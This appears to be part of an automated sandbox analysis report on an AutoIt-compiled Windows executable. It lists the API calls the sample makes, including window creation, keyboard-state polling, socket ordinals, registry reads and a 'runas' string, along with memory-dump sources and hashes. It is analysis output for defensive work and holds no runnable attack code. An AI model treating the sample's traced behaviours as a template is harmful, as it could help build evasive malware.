                                                                                                                                                                                                                                        • Part of subcall function 00E624CD: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001,00F33390,00E62399,00F32418,?), ref: 00E624FB
                                                                                                                                                                                                                                        • Part of subcall function 00E624CD: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000,?,?), ref: 00E6251C
                                                                                                                                                                                                                                        • Part of subcall function 00E624CD: ShowWindow.USER32(00000000,?,?,?,?,?,?,00E62282,?), ref: 00E62530
                                                                                                                                                                                                                                        • Part of subcall function 00E624CD: ShowWindow.USER32(00000000,?,?,?,?,?,?,00E62282,?), ref: 00E62539
                                                                                                                                                                                                                                        • Part of subcall function 00E62874: Shell_NotifyIconW.SHELL32(00000000,?,?,?,00F32B30), ref: 00E62945
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • AutoIt, xrefs: 00EA2C33
                                                                                                                                                                                                                                      • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00EA2C38
                                                                                                                                                                                                                                      • runas, xrefs: 00EA2D03
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000013.00000002.42568483488.0000000000E61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42568457636.0000000000E60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569245926.0000000000EFD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569429921.0000000000F23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569503861.0000000000F2D000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569527408.0000000000F31000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569550795.0000000000F35000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_19_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell_
                                                                                                                                                                                                                                      • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                                                                                                                                                                                                                      • API String ID: 1385234928-2030392706
                                                                                                                                                                                                                                      • Opcode ID: 9f9d6ffd892ed4ed2dd7d8097dc36792746e87fd40e89079deaa1f6010b3a576
                                                                                                                                                                                                                                      • Instruction ID: 37bac7d0227bd0e11574ea35f856914e1062e3f70c66e53c3af6583eff0b85b8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9f9d6ffd892ed4ed2dd7d8097dc36792746e87fd40e89079deaa1f6010b3a576
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B5511930288345AEC705FF64FC059BEBBE99B957A4F00242DF681771A3CB24954DE722
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • InitializeConditionVariable, xrefs: 00E803C8
                                                                                                                                                                                                                                      • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00E803A2
                                                                                                                                                                                                                                      • WakeAllConditionVariable, xrefs: 00E803E2
                                                                                                                                                                                                                                      • SleepConditionVariableCS, xrefs: 00E803D4
                                                                                                                                                                                                                                      • kernel32.dll, xrefs: 00E803B3
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000013.00000002.42568483488.0000000000E61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42568457636.0000000000E60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569245926.0000000000EFD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569429921.0000000000F23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569503861.0000000000F2D000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569527408.0000000000F31000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569550795.0000000000F35000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_19_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressProc$HandleModule$CountCriticalInitializeSectionSpin
                                                                                                                                                                                                                                      • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                                                                                                                      • API String ID: 798235881-1714406822
                                                                                                                                                                                                                                      • Opcode ID: 6e4b84331caf752afcf2f9b634cda2536491d5eb476a46f416c9f98464a92a2b
                                                                                                                                                                                                                                      • Instruction ID: 84fb1bd5cf8666600c35de3092aa056424ed5f218276dbc28733f7f70b63d423
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6e4b84331caf752afcf2f9b634cda2536491d5eb476a46f416c9f98464a92a2b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F721F632A4A7016FD7607BA59C06B6A3BD5EB45F61F041025F91DB72C0DF709C08A761
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000001), ref: 00EC6380
                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 00EC6399
                                                                                                                                                                                                                                      • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00EC63F7
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000002), ref: 00EC6407
                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 00EC6419
                                                                                                                                                                                                                                      • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00EC646D
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00EC647B
                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 00EC648D
                                                                                                                                                                                                                                      • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00EC64CF
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 00EC64E2
                                                                                                                                                                                                                                      • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00EC64F8
                                                                                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00EC6505
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000013.00000002.42568483488.0000000000E61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42568457636.0000000000E60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569245926.0000000000EFD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569429921.0000000000F23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569503861.0000000000F2D000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569527408.0000000000F31000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569550795.0000000000F35000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_19_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3096461208-0
                                                                                                                                                                                                                                      • Opcode ID: d9cd1bcf12fea207a9f3b15e503ce18683a871b8ab45b6a504363b7ec826262a
                                                                                                                                                                                                                                      • Instruction ID: 7b9165202d1205cbd64bc13193244bddca401009d3ef166bc1079155d02d57f5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d9cd1bcf12fea207a9f3b15e503ce18683a871b8ab45b6a504363b7ec826262a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5E511F70A04219AFDF08CF69DD89AAE7BB6FB88315F10812DF919F6290D7719D05CB50
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetSysColorBrush.USER32(0000000F,00000001,00F33390,?), ref: 00E623F8
                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00E62407
                                                                                                                                                                                                                                      • LoadIconW.USER32(00000063), ref: 00E6241D
                                                                                                                                                                                                                                      • LoadIconW.USER32(000000A4), ref: 00E6242F
                                                                                                                                                                                                                                      • LoadIconW.USER32(000000A2), ref: 00E62441
                                                                                                                                                                                                                                      • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00E62459
                                                                                                                                                                                                                                      • RegisterClassExW.USER32(?), ref: 00E624AA
                                                                                                                                                                                                                                        • Part of subcall function 00E6253E: GetSysColorBrush.USER32(0000000F,00000000), ref: 00E62571
                                                                                                                                                                                                                                        • Part of subcall function 00E6253E: RegisterClassExW.USER32(00000030), ref: 00E6259B
                                                                                                                                                                                                                                        • Part of subcall function 00E6253E: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E625AC
                                                                                                                                                                                                                                        • Part of subcall function 00E6253E: InitCommonControlsEx.COMCTL32(?), ref: 00E625C9
                                                                                                                                                                                                                                        • Part of subcall function 00E6253E: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E625D9
                                                                                                                                                                                                                                        • Part of subcall function 00E6253E: LoadIconW.USER32(000000A9), ref: 00E625EF
                                                                                                                                                                                                                                        • Part of subcall function 00E6253E: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E625FE
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000013.00000002.42568483488.0000000000E61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42568457636.0000000000E60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569245926.0000000000EFD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569429921.0000000000F23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569503861.0000000000F2D000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569527408.0000000000F31000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569550795.0000000000F35000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_19_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                                                                                                                      • String ID: #$0$AutoIt v3
                                                                                                                                                                                                                                      • API String ID: 423443420-4155596026
                                                                                                                                                                                                                                      • Opcode ID: fab7514ac643d005ee6bb94e2b7a65ba3da6ed1f4294b1830118accf6b810de2
                                                                                                                                                                                                                                      • Instruction ID: 77754ca4ae3c49598975fd49aba91b1e14136e35e139b33eefa9aa52dfd9bfd3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fab7514ac643d005ee6bb94e2b7a65ba3da6ed1f4294b1830118accf6b810de2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 80213A71D0031CAFDB509FA5EC55AA9BFB6FB48B60F10401AE604B63A0D7B90544EF90
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CoInitialize.OLE32(00000000,00EFDCD0), ref: 00ED8343
                                                                                                                                                                                                                                      • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00ED83DF
                                                                                                                                                                                                                                      • SHGetDesktopFolder.SHELL32(?), ref: 00ED83F3
                                                                                                                                                                                                                                      • CoCreateInstance.OLE32(00F00CF0,00000000,00000001,00F27E7C,?), ref: 00ED843F
                                                                                                                                                                                                                                      • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00ED84C4
                                                                                                                                                                                                                                      • CoTaskMemFree.OLE32(?,?), ref: 00ED851C
                                                                                                                                                                                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 00ED85A7
                                                                                                                                                                                                                                      • SHGetPathFromIDListW.SHELL32(00000000,?,?), ref: 00ED85CA
                                                                                                                                                                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00ED85D1
                                                                                                                                                                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00ED8626
                                                                                                                                                                                                                                      • CoUninitialize.OLE32 ref: 00ED862C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000013.00000002.42568483488.0000000000E61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42568457636.0000000000E60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569245926.0000000000EFD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569429921.0000000000F23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569503861.0000000000F2D000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569527408.0000000000F31000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569550795.0000000000F35000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_19_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2762341140-0
                                                                                                                                                                                                                                      • Opcode ID: 0353aeb03863746e33cc8b237970532956f450f3db5c1169280ce5e22cd3af4a
                                                                                                                                                                                                                                      • Instruction ID: 516b7eb69df92b5a137c063f8b915a960f75ee4fd7c5c42952eec1b4a939c832
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0353aeb03863746e33cc8b237970532956f450f3db5c1169280ce5e22cd3af4a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AFC14A75A00209AFCB14DF64C984DAEBBF9FF48344B149499E41AEB361CB30ED46CB90
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • #41.OLEAUT32(0000000C,?,?,?,?,00EC0093), ref: 00EC00DE
                                                                                                                                                                                                                                      • #37.OLEAUT32(?,?,?,00EC0093), ref: 00EC0137
                                                                                                                                                                                                                                      • #8.OLEAUT32(?,?,?,00EC0093), ref: 00EC0149
                                                                                                                                                                                                                                      • #23.WSOCK32(?,?,?,?,00EC0093), ref: 00EC0169
                                                                                                                                                                                                                                      • #10.WSOCK32(?,?,00000002,?,?,?,00EC0093), ref: 00EC01BC
                                                                                                                                                                                                                                      • #24.OLEAUT32(?,00000002,?,?,?,00EC0093), ref: 00EC01D0
                                                                                                                                                                                                                                      • #9.WSOCK32(?,?,?,00EC0093), ref: 00EC01E5
                                                                                                                                                                                                                                      • #39.OLEAUT32(?,?,?,00EC0093), ref: 00EC01F2
                                                                                                                                                                                                                                      • #38.OLEAUT32(?,?,?,00EC0093), ref: 00EC01FB
                                                                                                                                                                                                                                      • #9.WSOCK32(?,?,?,00EC0093), ref: 00EC020D
                                                                                                                                                                                                                                      • #38.OLEAUT32(?,?,?,00EC0093), ref: 00EC0218
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000013.00000002.42568483488.0000000000E61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42568457636.0000000000E60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569245926.0000000000EFD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569429921.0000000000F23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569503861.0000000000F2D000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569527408.0000000000F31000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569550795.0000000000F35000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_19_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 8a7cc182526e9777672c4444786575627acb01a8b455a5ad95e55c3eae1375c5
                                                                                                                                                                                                                                      • Instruction ID: 2b3b8f38616e28463e3841ea9fd904eddb78257b59001fce68cf6ce39c8b6a6f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8a7cc182526e9777672c4444786575627acb01a8b455a5ad95e55c3eae1375c5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E0416071A00219DFCF04DF69DC48EADBFBAEF48344F048069E955B7261C731AA46CB90
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetKeyboardState.USER32(?), ref: 00ECA349
                                                                                                                                                                                                                                      • GetAsyncKeyState.USER32(000000A0), ref: 00ECA3CA
                                                                                                                                                                                                                                      • GetKeyState.USER32(000000A0), ref: 00ECA3E5
                                                                                                                                                                                                                                      • GetAsyncKeyState.USER32(000000A1), ref: 00ECA3FF
                                                                                                                                                                                                                                      • GetKeyState.USER32(000000A1), ref: 00ECA414
                                                                                                                                                                                                                                      • GetAsyncKeyState.USER32(00000011), ref: 00ECA42C
                                                                                                                                                                                                                                      • GetKeyState.USER32(00000011), ref: 00ECA43E
                                                                                                                                                                                                                                      • GetAsyncKeyState.USER32(00000012), ref: 00ECA456
                                                                                                                                                                                                                                      • GetKeyState.USER32(00000012), ref: 00ECA468
                                                                                                                                                                                                                                      • GetAsyncKeyState.USER32(0000005B), ref: 00ECA480
                                                                                                                                                                                                                                      • GetKeyState.USER32(0000005B), ref: 00ECA492
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000013.00000002.42568483488.0000000000E61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42568457636.0000000000E60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569245926.0000000000EFD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569429921.0000000000F23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569503861.0000000000F2D000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569527408.0000000000F31000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569550795.0000000000F35000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_19_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: State$Async$Keyboard
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 541375521-0
                                                                                                                                                                                                                                      • Opcode ID: 7e96ec2ac8d5adbf3db2aa4a27aaff0680437ca9011ee336994e6112c2faa509
                                                                                                                                                                                                                                      • Instruction ID: 4dbc24a9957e0092152ebff6df1b45676a04c6ff3fc72c8f8d5c5dadcd40e6a7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7e96ec2ac8d5adbf3db2aa4a27aaff0680437ca9011ee336994e6112c2faa509
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F14106205047CDADFF344BA48A18BB9BEA1BB1130CF0C906DC5D66A1C2DAD69DC9C763
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00ECE2DF
                                                                                                                                                                                                                                      • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00ECE305
                                                                                                                                                                                                                                      • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00ECE37B
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000013.00000002.42568483488.0000000000E61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42568457636.0000000000E60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569245926.0000000000EFD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569429921.0000000000F23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569503861.0000000000F2D000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569527408.0000000000F31000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569550795.0000000000F35000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_19_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileInfoVersion$QuerySizeValue
                                                                                                                                                                                                                                      • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                                                                                                                      • API String ID: 2179348866-1459072770
                                                                                                                                                                                                                                      • Opcode ID: cb258be4015a4ebafceb105e8c61c8f0819cf25af50f58fff47dc5af2bed2886
                                                                                                                                                                                                                                      • Instruction ID: 4d3ed5636bafbba6d6f8c3bbea53e0b717bd695b7305968d2f93baf627732158
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cb258be4015a4ebafceb105e8c61c8f0819cf25af50f58fff47dc5af2bed2886
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AF410572904204BADB15B765AD06FFF7BECEF41710F14602AFA0CF61C2EA759A0193A1
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000101F,00000000,00000000,00001200,00000000,00000000,?,?,?), ref: 00EF4302
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,?,0000101F,00000000,00000000,00001200,00000000,00000000,?,?,?), ref: 00EF4305
                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0,?,0000101F,00000000,00000000,00001200,00000000,00000000,?,?,?), ref: 00EF432C
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00EF434F
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000007,?,00000000,00F328C4), ref: 00EF43C7
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00EF4411
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00EF442C
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000101D,00001004,00000000,?,00001057,00000000,00000000), ref: 00EF4447
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000101E,00001004,00000000,?,0000101D,00001004,00000000,?,00001057,00000000,00000000), ref: 00EF445B
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001008,00000000,00000007,?,00000000,00F328C4,?,0000104D,00000000,00000007,?,00000000,00F328C4), ref: 00EF4478
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000013.00000002.42568483488.0000000000E61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42568457636.0000000000E60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569245926.0000000000EFD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569429921.0000000000F23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569503861.0000000000F2D000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569527408.0000000000F31000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569550795.0000000000F35000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_19_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$LongWindow
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 312131281-0
                                                                                                                                                                                                                                      • Opcode ID: 09c7ff795048f116a60f01514da9e39f0c9742c856e69c0f2fca56facf942a97
                                                                                                                                                                                                                                      • Instruction ID: f6760e69b82278a7bb533e13746d171ad5e21365e56df9a6ea825ecba94c7f85
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 09c7ff795048f116a60f01514da9e39f0c9742c856e69c0f2fca56facf942a97
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1D6156B1A00208AFDB11DFA8CC81FFEB7F9AB49714F104059FA15B72A1D770AA41DB60
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00E645CC: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00EA3BD6,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 00E645EA
                                                                                                                                                                                                                                        • Part of subcall function 00E64270: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00E64292
                                                                                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00E643FC
                                                                                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00EA3C5D
                                                                                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00EA3C9E
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00EA3CE0
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000013.00000002.42568483488.0000000000E61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E60000, based on PE: true
